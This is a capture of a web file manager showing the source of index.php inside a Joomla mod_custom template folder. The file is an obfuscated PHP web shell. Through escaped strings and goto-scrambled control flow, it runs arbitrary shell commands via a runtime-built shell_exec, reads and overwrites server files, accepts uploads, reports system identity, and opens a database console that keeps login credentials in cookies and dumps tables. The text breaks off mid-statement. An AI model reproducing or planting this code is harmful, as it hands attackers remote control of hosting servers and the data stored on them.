芝麻web文件管理V1.00

编辑当前文件:/home2/sdektunc/testcors.sdektun.com/modules/mod_custom/tmpl/599256/index.php
<?php goto GMnFM; CdHEz: if (function_exists("\160\157\x73\x69\170\x5f\x67\x65\164\x65\147\151\x64")) { $qid = posix_getgrgid(posix_getegid()); $qrup = $qid["\156\141\x6d\145"]; print "\74\163\160\141\x6e\x20\143\154\141\163\163\75\47\x71\141\x6c\151\x6e\47\76\125\156\141\x6d\x65\72\x3c\57\163\x70\141\x6e\76\x20" . php_uname() . "\74\x62\x72\x2f\x3e"; print "\74\163\x70\141\x6e\40\143\154\141\163\x73\x3d\47\161\141\154\151\x6e\47\x3e\x55\x73\145\x72\72\74\x2f\x73\160\141\156\x3e\x20" . getmyuid() . "\40\50" . get_current_user() . "\51\x3c\142\x72\x2f\x3e"; print "\x3c\x73\x70\141\x6e\40\143\x6c\x61\163\163\75\47\x71\x61\x6c\151\156\47\76\x47\162\x6f\x75\160\72\x3c\x2f\163\160\141\156\76\40" . getmygid() . "\40\50" . $qrup . "\x29\x3c\x62\162\x2f\x3e"; } else { print "\74\163\x70\x61\156\40\143\x6c\x61\163\163\75\47\x71\x61\x6c\x69\156\47\x3e\x55\156\x61\155\145\72\x3c\x2f\x73\x70\x61\x6e\x3e\x20" . php_uname() . "\74\142\x72\57\x3e"; print "\x3c\163\160\141\156\x20\143\154\141\163\163\x3d\x27\x71\x61\x6c\151\x6e\x27\76\125\163\x65\162\x3a\x3c\57\x73\x70\x61\x6e\76\x20" . getmyuid() . "\40\x28" . get_current_user() . "\x29\74\142\162\x2f\x3e"; print "\74\x73\x70\141\156\40\143\x6c\x61\x73\163\75\47\161\x61\154\x69\x6e\47\76\x47\x72\157\x75\160\72\74\x2f\x73\x70\141\x6e\x3e\x20" . getmygid() . "\74\x62\162\x2f\x3e"; } goto pbROK; Df3jA: echo urlencode(urlencode(shifrele($default_dir))); goto NGaCE; LUWBq: echo urlencode(urlencode(shifrele($default_dir))); goto MTNnv; ZnnlK: echo urlencode(shifrele($default_dir)); goto S1HzG; p0k0P: echo urlencode(urlencode(shifrele($default_dir))); goto NS5SY; SU0QX: $default_dir = str_replace("\134", "\57", $default_dir); goto IX0YF; g5cT_: function sizeFormat($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . "\x20\x47\142"; } else { if ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . "\x20\x4d\142"; } else { if ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . "\40\x4b\x62"; } else { $bytes = $bytes . "\x20\142"; } } } return $bytes; } goto C_4T0; qKRjE: echo urlencode(urlencode(shifrele($default_dir))); goto uLjjF; Y99yS: ?> ");a&&sehife("?ne=ziple&qovluq=<?php goto LUWBq; MTNnv: ?> &zf="+e+"&save_to="+b64EncodeUnicode(a))}function silPapka(e){confirm("are you sure?")&&sehife("?ne=papka_sil&qovluq=<?php goto Df3jA; NS5SY: ?> ")}function sistemKom(){var e=document.getElementById("emr_et_atash").value;e&&sehife("?ne=sistem_kom&kom="+b64EncodeUnicode(e)+"&qovluq=<?php goto qKRjE; O5_CZ: ?> ')">CONSOLE</a><br><a href="javascript:sehife('?ne=skl');">SQL</a><br><form method="POST"enctype="multipart/form-data"><input value="fayl_upl"name="ne"type="hidden"> <input value="<?php goto ZnnlK; EoqqZ: qovluquYaz(); goto W3vrk; C_4T0: function utf8ize($d) { if (is_array($d)) { foreach ($d as $k => $v) { $d[$k] = utf8ize($v); } } else { if (is_string($d)) { return utf8_encode($d); } } return $d; } goto iYh8W; kXzcF: function shifrele($str) { $f = "\142\141\x73"; $f .= "\145\66"; $f .= "\64\137"; $f .= "\145"; $f .= "\156\x63"; $f .= "\x6f\144\145"; return $f($str); } goto f2vka; jR2rD: echo htmlspecialchars($default_dir); goto Y99yS; VRZcD: if ($ne == "\160\x68\x70\151\x6e\146\157") { print "\x3c\144\x69\166\x20\163\x74\x79\154\x65\75\47\167\151\144\x74\x68\x3a\x20\x31\x30\60\45\73\x20\x68\145\151\x67\x68\x74\x3a\40\x34\60\60\160\170\x3b\47\x3e\74\x69\146\162\x61\155\145\40\163\x72\143\75\47\x3f\x6e\145\75\x70\151\156\146\x27\40\163\164\x79\x6c\145\75\47\x77\x69\x64\x74\150\72\x20\61\x30\x30\x25\x3b\40\x68\x65\151\147\x68\164\x3a\40\x34\x30\60\x70\170\73\x20\142\157\162\144\x65\162\72\x20\x30\73\47\76\74\57\x69\146\x72\x61\x6d\x65\x3e\x3c\x2f\144\151\x76\x3e"; } else { if ($ne == "\x73\151\163\164\145\155\137\153\157\155") { if (isset($_POST["\153\x6f\x6d"]) && is_string($_POST["\153\x6f\x6d"]) && !empty($_POST["\153\157\x6d"])) { $komanda = deshifrele(urldecode($_POST["\153\157\155"])); $k = "\x73\x68"; $k .= "\x65\154"; $k .= "\154\137\x65"; $k .= "\x78\145"; $k .= "\143"; $output = $k($komanda); print "\x3c\160\x72\x65\x20\x73\164\171\x6c\145\x3d\42\x6d\141\170\x2d\x68\145\151\x67\150\x74\x3a\40\63\x35\x30\160\x78\x3b\157\166\145\162\x66\x6c\x6f\x77\72\40\141\x75\x74\x6f\73\40\x62\157\x72\x64\145\162\72\40\x31\x70\170\40\x73\157\154\151\x64\x20\43\x37\x37\x37\73\40\160\141\x64\x64\x69\156\147\72\x20\x35\160\170\73\x22\76" . htmlspecialchars($output) . "\74\x2f\160\162\145\76\x3c\150\162\76"; } print "\74\x69\x6e\160\x75\164\x20\164\171\x70\145\x3d\x22\x74\145\170\164\42\x20\151\x64\75\x22\145\x6d\x72\137\x65\164\x5f\141\x74\141\163\150\42\40\x73\x74\x79\154\x65\x3d\x22\167\151\144\x74\150\72\x20\65\60\x30\x70\x78\x3b\42\76\40\x3c\x62\165\x74\164\x6f\156\40\164\x79\160\x65\75\x22\142\165\x74\x74\157\156\x22\x20\x63\154\141\x73\163\75\x22\142\x74\x6e\x22\x20\x6f\156\x63\154\x69\143\153\x3d\x22\x73\x69\163\164\145\x6d\x4b\157\155\50\x29\x3b\x22\76\105\170\x65\143\x75\164\145\74\57\142\x75\164\x74\157\x6e\x3e"; } else { if ($ne == "\146\x61\x79\154\137\157\170\x75" && isset($_POST["\146\x61\x79\154"]) && '' != trim($_POST["\x66\141\171\x6c"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\146\141\171\154"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\x2f" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { $elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? "\40\x6f\x6e\x63\154\151\143\x6b\75\x27\x73\145\150\151\x66\x65\50\42\x3f\156\x65\x3d\x66\141\171\154\137\162\x65\144\141\153\164\145\46\146\x61\171\154\x3d" . urlencode(urlencode(shifrele($faylAdi))) . "\46\x71\157\x76\x6c\165\x71\75" . urlencode(urlencode(shifrele($default_dir))) . "\42\51\x27" : "\40\144\151\163\141\x62\154\145\144"; print "\x3c\144\151\x76\x3e\x4e\157\x6d\40\144\165\x20\x66\151\x63\x68\151\145\x72\x3a\40\x3c\x73\160\141\156\40\x63\154\141\163\x73\75\47\161\x61\x6c\x69\156\47\x3e" . htmlspecialchars($faylAdi) . "\74\57\163\x70\141\x6e\76\74\x62\162\57\x3e\74\x62\165\x74\164\x6f\156\40\143\154\x61\163\x73\75\x27\142\x74\x6e\x27{$elaveBtn}\x3e\x20\105\144\x69\x74\40\x3c\x2f\x62\165\x74\x74\157\x6e\76\x3c\57\144\151\166\76"; print "\74\144\x69\166\x20\143\154\x61\x73\x73\x3d\47\146\141\x79\154\x5f\x6f\170\165\47\x3e" . highlight_string(file_get_contents($default_dir . $ayirici . $faylAdi), true) . "\x3c\x2f\x64\151\166\x3e"; } } else { if ($ne == "\x73\x6b\154") { $host = isset($_COOKIE["\x68\157\x73\164"]) ? $_COOKIE["\150\x6f\x73\164"] : ''; $user = isset($_COOKIE["\165\163\145\162"]) ? $_COOKIE["\x75\x73\x65\162"] : ''; $parol = isset($_COOKIE["\160\141\x72\157\154"]) ? $_COOKIE["\160\x61\162\x6f\154"] : ''; $baza = isset($_COOKIE["\x62\x61\x7a\x61"]) ? $_COOKIE["\x62\141\x7a\x61"] : ''; if (isset($_POST["\150\x6f\x73\x74"], $_POST["\x75\163\145\x72"], $_POST["\x70\141\x72\x6f\154"]) && is_string($_POST["\x68\x6f\163\164"]) && is_string($_POST["\x75\163\145\x72"]) && is_string($_POST["\x70\x61\x72\157\154"])) { $host = $_POST["\x68\157\x73\164"]; $user = $_POST["\x75\163\x65\162"]; $parol = $_POST["\160\141\x72\157\154"]; $baza = ''; setcookie("\150\x6f\163\164", $host, time() + 360000); setcookie("\165\163\145\162", $user, time() + 360000); setcookie("\x70\x61\162\x6f\154", $parol, time() + 360000); setcookie("\x62\x61\x7a\141", $baza, time() + 360000); } if (isset($_POST["\x62\x61\x7a\x61"]) && is_string($_POST["\x62\141\x7a\x61"])) { $baza = $_POST["\142\x61\172\141"]; setcookie("\142\141\x7a\x61", $baza, time() + 360000); } $bazaStr = empty($baza) ? '' : "\x64\x62\x6e\141\x6d\x65\x3d" . $baza . "\73"; ?> <form method="POST"><input value="skl"name="ne"type="hidden"> <input value="<?php echo htmlspecialchars($host); ?> "name="host"placeholder="Hostname"> <input value="<?php echo htmlspecialchars($user); ?> "name="user"placeholder="User"> <input value="<?php echo htmlspecialchars($parol); ?> "name="parol"placeholder="Parol"> <input value="Sign in"type="submit"></form><?php if (!empty($host)) { try { $pdo = new PDO("\155\x79\x73\x71\154\72\150\x6f\x73\164\75" . $host . "\x3b\x63\150\141\162\x73\145\164\75\x75\164\146\x38\73" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\x53\x45\124\40\116\101\x4d\105\x53\x20\x27\x75\164\x66\70\47")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $schematas = $pdo->query("\123\x45\x4c\x45\103\x54\40\163\143\150\145\x6d\141\137\x6e\141\155\145\x20\x46\x52\x4f\x4d\x20\151\x6e\x66\x6f\x72\155\x61\x74\151\x6f\156\x5f\x73\x63\x68\x65\155\141\x2e\x73\143\x68\x65\x6d\141\x74\141"); print "\x3c\146\x6f\162\x6d\x20\x6d\x65\164\150\157\144\x3d\42\120\117\x53\124\x22\x3e\74\x69\x6e\x70\165\x74\40\x74\171\160\x65\x3d\x22\150\151\x64\x64\x65\156\x22\40\156\x61\155\x65\75\42\x6e\x65\x22\x20\166\x61\x6c\x75\x65\75\x22\x73\153\x6c\x22\76\74\x73\145\x6c\145\x63\164\x20\x6e\141\x6d\x65\x3d\x22\x62\x61\172\x61\x22\76"; foreach ($schematas->fetchAll() as $schemaName) { print "\74\x6f\160\164\x69\157\x6e" . ($baza == $schemaName["\163\x63\150\145\x6d\x61\137\x6e\141\x6d\x65"] ? "\x20\163\x65\154\x65\x63\x74\145\x64" : '') . "\x3e" . htmlspecialchars($schemaName["\163\x63\150\145\x6d\141\137\x6e\x61\x6d\x65"]) . "\x3c\x2f\x6f\x70\164\x69\157\156\x3e"; } print "\74\57\x73\x65\154\145\x63\164\76\40\74\x69\x6e\160\165\x74\x20\164\171\160\x65\75\x22\x73\x75\142\x6d\x69\164\42\x20\x76\141\x6c\165\145\75\42\123\145\143\x68\41\42\76\x3c\57\146\157\x72\x6d\76"; if (!empty($baza)) { $tables = $pdo->prepare("\123\x45\x4c\105\x43\124\40\164\x61\142\154\x65\x5f\156\x61\x6d\145\x20\x66\162\157\x6d\x20\151\x6e\x66\x6f\x72\x6d\x61\x74\x69\157\156\137\x73\x63\x68\x65\155\x61\x2e\164\x61\x62\154\145\163\40\x77\150\145\x72\x65\x20\164\141\142\x6c\145\x5f\163\x63\x68\x65\x6d\x61\x3d\77"); $tables->execute(array($baza)); $tables = $tables->fetchAll(); print "\74\x64\x69\x76\x20\x73\164\x79\154\145\x3d\42\x66\x6c\x6f\141\164\x3a\x20\x6c\x65\146\164\73\40\167\x69\x64\164\x68\x3a\40\x32\60\45\x3b\x20\x6f\x76\145\x72\146\154\x6f\167\x3a\x20\141\165\x74\157\x3b\x20\x62\x6f\162\144\x65\x72\55\162\x69\147\x68\164\x3a\x20\x31\x70\170\x20\x73\157\x6c\151\x64\40\43\71\71\71\73\x22\76"; print "\x3c\x61\40\x68\x72\x65\146\x3d\42\152\x61\x76\141\163\143\x72\151\x70\164\x3a\x73\145\150\151\x66\145\x28\47\x3f\156\x65\x3d\x73\153\x6c\137\x64\47\x29\x3b\x22\x3e\x21\x21\x20\x44\165\155\160\40\x44\x42\40\x21\41\74\x2f\141\76\x3c\150\162\x3e"; foreach ($tables as $tableName) { $tableName = $tableName["\x74\141\x62\x6c\x65\137\x6e\141\155\145"]; print "\74\x61\40\150\162\x65\x66\x3d\42\x6a\x61\166\141\163\143\162\x69\160\164\72\163\x65\x68\x69\x66\x65\x28\47\77\156\145\75\x73\x6b\x6c\46\164\75" . urlencode(urlencode(shifrele($tableName))) . "\x27\x29\42\x3e" . htmlspecialchars($tableName) . "\74\57\x61\x3e\74\142\162\76"; } print "\74\x2f\144\151\x76\76"; print "\74\x64\151\x76\x20\x73\164\171\x6c\x65\75\42\146\154\157\141\164\x3a\40\154\145\x66\164\x3b\x20\160\x61\x64\x64\x69\156\147\x2d\x6c\145\146\x74\72\x20\x31\60\x70\170\x3b\x20\167\x69\144\164\150\x3a\40\67\65\x25\x3b\x22\76"; if (isset($_POST["\164"]) && is_string($_POST["\x74"]) && !empty($_POST["\164"])) { $tableName = deshifrele(urldecode($_POST["\x74"])); print "\x3c\x73\x70\141\156\x20\143\154\x61\163\x73\x3d\42\161\141\x6c\x69\156\x22\x3e\x54\141\x62\x6c\145\x3a\74\57\x73\x70\141\156\x3e\40" . htmlspecialchars($tableName) . "\x20\x28\40\74\x61\x20\150\162\x65\x66\75\42\x6a\x61\166\141\x73\143\x72\151\x70\164\72\163\145\150\x69\146\145\x28\47\x3f\x6e\x65\x3d\163\x6b\x6c\137\x64\x5f\164\x26\x74\x3d" . urlencode(urlencode(shifrele($tableName))) . "\x27\x29\42\76\104\165\155\160\74\x2f\x61\x3e\x20\x29\74\x62\x72\76"; $getColumns = $pdo->prepare("\x53\x45\x4c\105\103\124\x20\143\x6f\x6c\165\155\156\x5f\156\141\155\145\x20\146\x72\x6f\155\40\x69\156\x66\x6f\162\x6d\x61\x74\x69\157\x6e\x5f\x73\x63\x68\145\155\141\x2e\x63\157\154\165\155\x6e\163\40\167\x68\x65\x72\x65\x20\164\141\142\x6c\x65\x5f\x73\143\150\x65\x6d\141\x3d\x3f\40\x61\x6e\x64\x20\164\141\142\x6c\145\x5f\x6e\x61\x6d\145\75\77"); $getColumns->execute(array($baza, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $dataCount = $pdo->query("\x53\105\x4c\105\103\x54\40\x63\x6f\x75\x6e\164\50\x30\x29\40\x41\x53\x20\163\x73\x20\146\162\x6f\155\40\x60" . $tableName . "\x60"); $dataCount = (int) $dataCount->fetchColumn(); print "\74\163\x70\141\156\x20\x63\x6c\x61\163\x73\75\42\161\x61\154\151\156\x22\x3e\x43\157\165\156\x74\72\x3c\57\163\x70\141\x6e\x3e\x20" . $dataCount . "\74\x62\x72\76\x3c\x62\x72\x3e"; $pages = ceil($dataCount / 100); $currentPage = isset($_POST["\x73\145\150\x69\146\x65"]) && is_numeric($_POST["\x73\x65\x68\x69\x66\145"]) && $_POST["\x73\x65\150\151\x66\x65"] >= 1 && $_POST["\163\x65\150\151\x66\x65"] <= $pages ? (int) $_POST["\x73\145\150\151\x66\x65"] : 1; for ($p = 1; $p <= $pages; $p++) { print "\74\x61\40\163\164\171\154\x65\x3d\x22" . ($currentPage == $p ? "\142\x61\x63\x6b\147\x72\157\165\156\x64\x3a\x20\43\x34\64\x34\x3b" : '') . "\155\141\162\x67\151\x6e\x2d\154\145\146\164\72\x20\x32\x70\170\73\x20\155\141\162\x67\x69\156\x2d\142\157\x74\164\x6f\x6d\x3a\40\x35\x70\170\73\x20\x70\x61\x64\x64\x69\156\147\72\x20\62\160\x78\x20\66\x70\x78\73\x20\142\157\162\x64\x65\162\x3a\40\x31\160\170\x20\163\157\154\151\144\x20\43\67\106\106\106\60\x30\x3b\x20\x74\x65\170\x74\55\x64\145\143\157\x72\x61\164\151\x6f\x6e\x3a\40\x6e\x6f\x6e\x65\73\42\x20\150\x72\x65\146\75\42\x6a\x61\166\x61\x73\x63\x72\x69\160\x74\72\163\x65\150\x69\146\145\x28\47\x3f\x6e\x65\75\163\153\154\x26\x74\x3d" . urlencode(urlencode(shifrele($tableName))) . "\46\163\145\x68\151\x66\145\x3d" . $p . "\47\x29\x3b\x22\76" . $p . "\74\x2f\141\x3e\40"; } print "\74\142\x72\x3e\74\142\x72\x3e"; $start = 100 * ($currentPage - 1); $data = $pdo->query("\x53\105\114\x45\103\124\40\x2a\40\x46\122\x4f\x4d\40\140" . $tableName . "\140\40\114\x49\x4d\x49\124\x20" . $start . "\x20\x2c\40\61\60\60"); $data = $data->fetchAll(); print "\74\x74\141\142\x6c\x65\76\74\x74\x68\145\x61\144\x3e"; foreach ($columns as $columnInf) { print "\74\x74\x68\76" . htmlspecialchars($columnInf["\143\157\154\165\x6d\x6e\x5f\x6e\141\x6d\x65"]) . "\74\x2f\x74\150\76"; } print "\x3c\57\164\150\x65\141\144\x3e\x3c\x74\142\x6f\x64\x79\76"; foreach ($data as $row) { print "\74\x74\162\76"; foreach ($row as $key => $val) { print "\x3c\164\x64\76\74\144\151\x76\76" . $val . "\x3c\x2f\x64\x69\166\x3e\x3c\x2f\164\x64\x3e"; } print "\x3c\57\164\162\x3e"; } print "\74\x2f\164\x72\x3e\x3c\57\164\x62\x6f\144\171\x3e\x3c\57\164\141\x62\x6c\145\76"; } else { print "\x54\141\142\154\x65\40\156\x6f\x74\40\x66\157\x75\156\x64\x21"; } } else { if (isset($_POST["\145\155\162"]) && is_string($_POST["\145\x6d\162"]) && !empty($_POST["\x65\155\x72"])) { $emr = deshifrele(urldecode($_POST["\x65\155\x72"])); print "\x3c\163\x70\x61\x6e\x20\143\154\141\x73\x73\75\x22\x71\141\x6c\151\x6e\42\76\123\121\114\x20\x65\x6d\x72\x3a\74\x2f\163\160\141\x6e\x3e\40" . htmlspecialchars($emr) . "\x3c\x62\162\76"; $data = $pdo->query($emr); $data = $data->fetchAll(); print "\74\164\x61\x62\x6c\145\x3e\x3c\164\x68\145\141\144\76"; if (count($data) > 0) { print "\74\164\162\x3e"; foreach ($data[0] as $key => $val) { print "\x3c\164\150\x3e\74\144\151\166\76" . $key . "\74\x2f\144\x69\x76\76\x3c\57\164\x68\x3e"; } print "\x3c\57\164\162\x3e"; } print "\x3c\x2f\x74\150\x65\141\144\76\x3c\164\x62\157\144\x79\76"; foreach ($data as $row) { print "\74\x74\x72\x3e"; foreach ($row as $key => $val) { print "\74\x74\144\76\74\x64\x69\x76\76" . $val . "\74\57\144\x69\x76\76\74\x2f\164\x64\x3e"; } print "\x3c\x2f\164\162\x3e"; } print "\x3c\57\x74\162\x3e\x3c\57\x74\142\157\x64\171\x3e\74\57\164\x61\x62\154\x65\76"; } } print "\74\144\x69\x76\76\x3c\x74\x65\170\164\x61\x72\x65\x61\x20\x69\144\x3d\42\x73\x6b\x6c\137\x65\x6d\x72\x22\76\74\x2f\x74\145\x78\164\141\162\145\141\76\74\x62\165\164\x74\157\156\x20\164\x79\x70\145\75\x22\142\165\x74\x74\157\156\42\x20\157\x6e\x63\154\x69\x63\x6b\75\42\x73\153\154\x5f\142\141\x73\50\x29\x3b\42\x3e\x42\x61\163\40\x6d\145\x6e\x65\x3c\x2f\142\165\x74\164\x6f\x6e\76\74\x2f\144\151\166\76"; print "\74\57\x64\151\x76\76"; print "\74\x64\151\x76\40\x73\x74\x79\154\145\x3d\x22\143\x6c\x65\x61\162\x3a\x20\142\157\x74\150\x3b\42\x3e\x3c\x2f\144\x69\x76\76"; } } catch (Exception $e) { print $e->getMessage(); } } } else { if ($ne == "\x66\141\x79\154\137\162\145\144\141\153\x74\x65" && isset($_POST["\x66\x61\x79\x6c"]) && '' != trim($_POST["\x66\141\171\154"])) { $faylAdi = basename(deshifrele(urldecode(urldecode($_POST["\x66\141\x79\x6c"])))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($faylAdi, 0, 1) != "\x2f" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { $status = ''; if (isset($_POST["\143\157\x6e\x74\145\x6e\164"]) && isset($_POST["\x74\x6f\157\x6b"]) && $_POST["\x74\157\x6f\x6b"] != '' && isset($_SESSION["\x79\163\x5f\164\x6f\x6f\153"]) && $_SESSION["\171\163\137\x74\x6f\157\x6b"] == $_POST["\x74\x6f\157\x6b"] && is_writeable($default_dir . $ayirici . $faylAdi)) { unset($_SESSION["\x79\163\137\x74\157\x6f\x6b"]); $content = $_POST["\143\157\156\164\145\156\164"]; $cc = array("\141", "\x69", "\x65", "\x73", "\154", "\x62", "\165", "\157", "\x70", "\150", "\50", "\x29", "\x3c", "\76", "\x3f", "\73", "\x5b", "\x5d", "\x24"); foreach ($cc as $k1 => $v1) { $content = str_replace("\x7c\x3a" . $k1 . "\x3a\x7c", $v1, $content); } $faylAch = fopen($default_dir . $ayirici . $faylAdi, "\167\53"); fwrite($faylAch, $content); fclose($faylAch); $status = "\40\x3c\x73\160\x61\156\40\x63\x6c\x61\163\163\75\47\161\x61\154\x69\x6e\47\x3e\x55\x26\x23\x32\70\67\73\165\162\x6c\x61\40\x79\141\144\x64\141\x20\x73\x61\170\x6c\141\156\x26\x23\x33\x30\65\x3b\x6c\144\x26\x23\63\x30\65\x3b\41\x3c\57\x73\160\141\156\76"; } $oxuUrl = "\77\x6e\145\x3d\x66\x61\x79\154\137\x6f\170\x75\46\146\x61\x79\x6c\x3d" . urlencode(urlencode(shifrele($faylAdi))) . "\46\161\x6f\x76\x6c\x75\161\x3d" . urlencode(urlencode(shifrele($default_dir))); $elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? '' : "\x20\144\151\x73\141\x62\154\145\144"; print "\x3c\144\151\x76\76\106\x61\x79\x6c\x20\x61\x64\x26\43\63\60\x35\73\72\x20\x3c\x61\40\143\x6c\x61\x73\x73\x3d\x27\x71\141\154\151\x6e\47\x20\150\x72\145\146\75\47\152\x61\166\x61\x73\x63\x72\x69\x70\164\72\163\145\x68\x69\146\x65\50\x22{$oxuUrl}\x22\x29\x27\x3e" . htmlspecialchars($faylAdi) . "\x3c\57\141\x3e\74\142\x72\57\76\74\146\x6f\162\155\x20\155\145\164\x68\x6f\x64\x3d\x27\120\x4f\x53\124\x27\x20\163\x74\x79\154\x65\75\47\x70\x61\144\144\x69\156\x67\x3a\x20\60\x3b\40\x6d\x61\x72\x67\151\x6e\x3a\x20\x30\73\x27\76\74\142\165\164\x74\157\156\x20\164\171\160\x65\x3d\x27\x73\x75\142\x6d\x69\164\47\40\x63\154\141\x73\163\x3d\x27\142\x74\x6e\x27{$elaveBtn}\x3e\x20\x53\141\166\x65\xa\40\74\57\x62\x75\x74\164\157\156\x3e\x20\74\x62\x75\x74\164\157\x6e\40\x74\171\160\145\x3d\47\x62\x75\164\164\x6f\x6e\47\40\x6f\x6e\x63\x6c\151\143\x6b\75\47\x73\x68\151\x66\162\145\154\x65\145\x28\51\x27\76\x20\x43\x6f\x64\145\163\x20\74\x2f\142\x75\164\164\157\156\x3e\x20{$status}\x3c\x2f\x64\151\166\76"; print "\x3c\151\156\160\165\x74\40\164\x79\160\145\x3d\x27\150\151\144\x64\x65\x6e\x27\x20\x76\141\x6c\165\145\75\x27\x66\141\171\x6c\137\x72\x65\144\141\x6b\164\145\47\40\156\x61\155\x65\75\47\156\x65\x27\76\74\x69\156\x70\x75\x74\x20\x74\x79\x70\x65\75\47\x68\x69\144\x64\145\x6e\47\x20\166\141\x6c\x75\145\x3d\47" . shifrele($faylAdi) . "\47\40\x6e\141\155\145\75\47\x66\141\171\154\47\76\x3c\151\x6e\x70\165\x74\40\164\171\x70\145\x3d\x27\150\x69\x64\144\x65\156\x27\x20\x76\141\x6c\x75\x65\x3d\47" . urlencode(shifrele($default_dir)) . "\x27\40\x6e\x61\155\x65\x3d\x27\x71\x6f\166\x6c\x75\x71\x27\x3e\74\151\x6e\x70\165\x74\40\164\x79\x70\145\75\47\150\x69\144\x64\145\156\47\40\166\141\154\165\x65\x3d\x27" . tookYarat("\x79\163\137\164\157\157\153") . "\x27\x20\x6e\141\155\145\75\x27\164\157\x6f\153\x27\x3e\74\164\145\170\x74\x61\162\145\141\x20\156\x61\x6d\x65\x3d\47\143\x6f\156\x74\x65\156\x74\47\x20\143\154\x61\163\x73\x3d\x27\146\x69\154\x65\137\x65\x64\151\x74\47\x3e" . htmlspecialchars(file_get_contents($default_dir . $ayirici . $faylAdi)) . "\x3c\x2f\x74\145\x78\164\141\162\x65\141\x3e\x3c\x2f\146\157\162\x6d\76"; } else { print "\x45\x72\162\x6f\x72\41\40" . htmlspecialchars($default_dir . $ayirici . $faylAdi); } } else { if (is_dir($default_dir)) { if (is_readable($default_dir)) { $qovluqIchi = scandir($default_dir); foreach ($qovluqIchi as &$emelemnt) { $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($emelemnt, 0, 1) != "\x2f" ? "\x2f" : ''; if (is_dir($default_dir . $ayirici . $emelemnt)) { $emelemnt = "\x30" . $emelemnt; } else { $emelemnt = "\61" . $emelemnt; } } asort($qovluqIchi); print "\74\164\141\x62\154\x65\40\x63\154\x61\163\163\x3d\x27\146\x4d\141\x6e\141\147\x65\162\x27\40\163\x74\x79\x6c\x65\75\47\x77\x69\x64\x74\x68\72\40\61\60\60\45\x3b\x27\x3e\74\x74\150\145\x61\144\x3e\x3c\x74\162\40\x63\154\x61\x73\x73\75\x27\x71\x61\154\x69\x6e\47\x3e\74\x74\150\x3e\x73\74\x2f\x74\150\76\x3c\164\x68\76\x46\x61\x79\x6c\x3c\57\x74\150\76\x3c\x74\x68\76\123\x69\x7a\145\x3c\x2f\x74\x68\76\x3c\x74\150\76\x54\x61\162\x69\x78\x3c\x2f\x74\150\76\74\164\x68\x3e\x4f\167\x6e\x65\162\x2f\x47\x72\x6f\x75\160\x3c\x2f\x74\150\x3e\x3c\x74\150\76\120\145\162\x6d\x69\x73\x73\151\x6f\x6e\163\x3c\57\164\150\x3e\x3c\164\x68\76\101\143\164\151\x6f\156\163\74\57\x74\150\x3e\x3c\x2f\x74\x72\76\x3c\x2f\x74\x68\145\141\x64\76\x3c\x74\x62\157\x64\171\76"; foreach ($qovluqIchi as $element) { $url = ''; $element = substr($element, 1); $faylAdiTam = $default_dir . $ayirici . $element; $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($element, 0, 1) != "\x2f" ? "\57" : ''; $adi = is_dir($faylAdiTam) ? "\x5b\40{$element}\x20\x5d" : $element; $classN = ''; if (is_dir($faylAdiTam)) { if ($element == "\x2e") { $url = "\x3f\161\157\166\x6c\165\x71\75" . urlencode(urlencode(shifrele($default_dir))); } else { if ($element == "\56\x2e") { $yeniUrl = explode("\57", $default_dir); foreach (array_reverse($yeniUrl) as $j => $qq) { if (trim($qq) != '') { unset($yeniUrl[count($yeniUrl) - $j - 1]); break; } } $url = "\77\161\157\166\x6c\x75\x71\75" . urlencode(urlencode(shifrele(implode("\x2f", $yeniUrl)))); } else { $url = "\77\x71\157\x76\x6c\x75\161\x3d" . urlencode(urlencode(shifrele($faylAdiTam))); } } $classN = "\x20\x73\164\171\154\x65\75\47\x66\157\x6e\164\55\x77\145\x69\147\x68\164\x3a\40\66\60\60\73\47"; } else { $url = "\77\x6e\x65\x3d\146\x61\171\x6c\x5f\157\170\165\46\146\x61\x79\154\75" . urlencode(urlencode(shifrele($element))) . "\x26\x71\x6f\x76\154\165\161\75" . urlencode(urlencode(shifrele($default_dir))); } $fayldi = is_file($faylAdiTam); $isReadableColor = is_readable($faylAdiTam) && is_writeable($faylAdiTam); print "\74\x74\162\x3e\xa\x9\x9\11\x9\11\11\x3c\164\x64\x3e\74\x2f\x74\x64\x3e\xa\x9\11\11\11\x9\x9\74\x74\144\x3e\74\x61\x20\150\162\145\x66\75\x22\152\x61\166\x61\163\x63\x72\x69\160\164\72\x73\x65\150\151\146\x65\50\47" . $url . "\47\x29\42" . $classN . "\x3e" . htmlspecialchars($adi) . "\74\x2f\141\x3e\x3c\57\x74\144\76\12\11\11\x9\x9\11\11\74\x74\144\x3e" . ($fayldi ? sizeFormat(filesize($faylAdiTam)) : '') . "\74\57\164\144\76\xa\x9\x9\x9\11\x9\11\x3c\164\144\76" . date("\x64\40\115\x20\x59\x2c\x20\110\x3a\151", filectime($faylAdiTam)) . "\74\57\164\x64\x3e\xa\11\11\11\x9\x9\11\74\x74\144\x3e" . htmlspecialchars(fileowner($faylAdiTam)) . "\x3c\x2f\164\x64\76\12\x9\x9\11\11\11\x9\x3c\x74\x64" . ($isReadableColor ? "\40\x73\x74\x79\x6c\x65\x3d\42\x63\157\154\x6f\162\72\x20\x67\x72\145\x65\156\73\42" : '') . "\x3e" . substr(sprintf("\x25\x6f", fileperms($faylAdiTam)), -4) . "\x3c\57\164\x64\76\xa\11\11\11\11\11\11\74\x74\x64\x3e"; if (is_file($faylAdiTam)) { print 